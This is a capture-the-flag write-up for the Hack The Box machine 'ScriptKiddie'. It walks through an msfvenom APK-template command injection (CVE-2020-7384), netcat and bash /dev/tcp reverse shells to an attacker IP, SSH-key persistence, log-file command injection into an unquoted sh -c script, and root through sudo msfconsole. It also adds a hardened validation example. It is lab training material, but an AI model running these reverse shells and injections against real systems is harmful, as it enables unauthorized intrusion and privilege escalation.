HTB ScriptKiddie Writeup
INFO
Machine IP = 10.10.10.226
OS = Linux
Level = EASY
Points = 20
Write the IP of the machine to your /etc/hosts file:

```
echo "10.10.10.226 scriptkiddie.htb" >> /etc/hosts
```
Scanning

```
nmap -sC -sV 10.10.10.226
```
Enumeration

Nmap:

```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
```
The web page on port 5000 has a msfvenom tab that generates payloads and accepts an optional template file. Searching for "msfvenom template upload vuln" turns up CVE-2020-7384, a command injection in the way msfvenom handles APK templates. I found a GitHub PoC for it, cloned the code and ran it to get a malicious APK:

https://www.exploit-db.com/exploits/49491

Or use the Metasploit module:

https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/
```
msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST <Your IP Address>
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run
[+] msf.apk stored at /home/kali/.msf4/local/msf.apk
```
Start a listener on the port the module used (4444 is the default LPORT):

```
nc -lnvp 4444
```

Then upload the APK as the template on the site, set the IP field to 127.0.0.1 or any other IP address (its value does not matter, the command injection fires when msfvenom processes the template), choose Android as the OS and generate the payload to get a reverse shell:
```
listening on [any] 4444 ...
connect to [10.10.15.26] from (UNKNOWN) [10.10.10.226] 38492
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
```
Alternatively, you can do these steps to get a stable SSH session instead of the netcat shell:

- Get id_rsa.pub from your VM or PC (generate a key pair with ssh-keygen if you don't have one)
- On the reverse shell, append your id_rsa.pub to the kid user's authorized_keys (create ~/.ssh first with mkdir if it does not exist, and make sure it is not group or world writable, otherwise sshd will ignore the key):

```
echo "ssh-rsa ****=" >> ~/.ssh/authorized_keys
```

Then SSH in as kid:

```
ssh kid@scriptkiddie.htb
```
Upgrade the reverse shell to a tty and grab the user flag:

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
kid@scriptkiddie:~/html$ cd ~
kid@scriptkiddie:~$ ls
html  logs  snap  user.txt
kid@scriptkiddie:~$ cat user.txt
```
Let's enumerate the logs folder.

- The logs folder has only a hackers file, and it's empty
- /home has two users (kid and pwn); /etc/passwd lists those two plus root

In /home/pwn there is a scanlosers.sh file with the following code:

```
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```

The script reads /home/kid/logs/hackers (a file kid can write to), takes everything from the third space-separated field of each line and pastes it unquoted into a `sh -c` string. A line whose third field starts with `;` therefore terminates the nmap command and injects our own command, which runs as whichever user runs scanlosers.sh (pwn).
Go to the logs folder and append a line that makes the script spawn a reverse shell. The two leading spaces matter: `cut -d' ' -f3-` keeps the third field onwards, so they push the `;` and everything after it into the part that lands in the `sh -c` string, and the trailing `#` comments out the rest of the nmap command line:

```
echo "  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.26/8181 0>&1' #" >> hackers
```
And run a netcat listener on your machine (start it before writing the log line so the callback is caught):

```
nc -lnvp 8181
```
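To see exactly why the log line above works, here is an added example (not part of the original writeup or the box) that reproduces the transformation scanlosers.sh applies to one line of the hackers file, runs a harmless injected payload through the same `sh -c` path, and puts a hardened version next to it. The log-line format (two fields before the address) and the IPv4 validator are assumptions made for this example; nmap is never invoked for real.

```shell
#!/bin/sh
# Added example, not from the original writeup: reproduces how scanlosers.sh
# turns one line of the hackers log into the string it hands to `sh -c`, runs
# a harmless injected payload through that same path, and shows a hardened
# variant. nmap is never invoked for real.

# Same transformation as scanlosers.sh: cut -d' ' -f3- keeps everything from
# the third space-separated field on, and ${_ip} is spliced in unquoted.
vulnerable_cmd() {
    _ip=$(printf '%s\n' "$1" | cut -d' ' -f3-)
    printf '%s' "nmap --top-ports 10 -oN recon/${_ip}.nmap ${_ip} 2>&1 >/dev/null"
}

# Feed the built string to a shell exactly as the script does. PATH is emptied
# so the leading nmap call fails harmlessly and only the injected part runs.
run_vulnerable() {
    PATH=/nonexistent /bin/sh -c "$(vulnerable_cmd "$1")" 2>/dev/null
}

# Hardened check: accept only a dotted-quad IPv4 address (validation written
# for this example, not something the box does).
is_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    _old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$_old_ifs
    [ $# -eq 4 ] || return 1
    for _octet in "$@"; do
        [ "$_octet" -le 255 ] || return 1
    done
    return 0
}

# Hardened variant: validate first, then pass the value as a separate argument
# instead of interpolating it into a shell string. echo stands in for nmap.
safe_scan() {
    _ip=$(printf '%s\n' "$1" | cut -d' ' -f3-)
    is_ipv4 "$_ip" || { printf 'rejected: %s\n' "$_ip" >&2; return 1; }
    echo nmap --top-ports 10 -oN "recon/${_ip}.nmap" "$_ip"
}

# Constructed sample log lines (format assumed: two fields, then the address).
legit='2021-02-06 10:00:00 10.10.14.3'
benign_inject='  ;echo INJECTED #'
evil="  ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.26/8181 0>&1' #"

# Usage: show the three cases side by side.
vulnerable_cmd "$evil"; echo
run_vulnerable "$benign_inject"
safe_scan "$legit"
safe_scan "$evil" || true
```

`vulnerable_cmd "$evil"` prints the string the real script would execute: nmap gets `-oN recon/` and then `;` starts `/bin/bash -c '...'`, with `#` hiding the duplicated tail. `run_vulnerable` proves a shell really executes the injected part, while `safe_scan` rejects the same line before any shell sees it, and even for a valid address never builds a command string at all.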
On the pwn reverse shell, check `sudo -l` and run msfconsole through sudo; from the msf prompt you can execute any system command, so dropping to /bin/bash gives a root shell:

```
sudo msfconsole
msf6 > /bin/bash
stty: 'standard input': Inappropriate ioctl for device
[*] exec: /bin/bash
cat /root/root.txt
```

Done!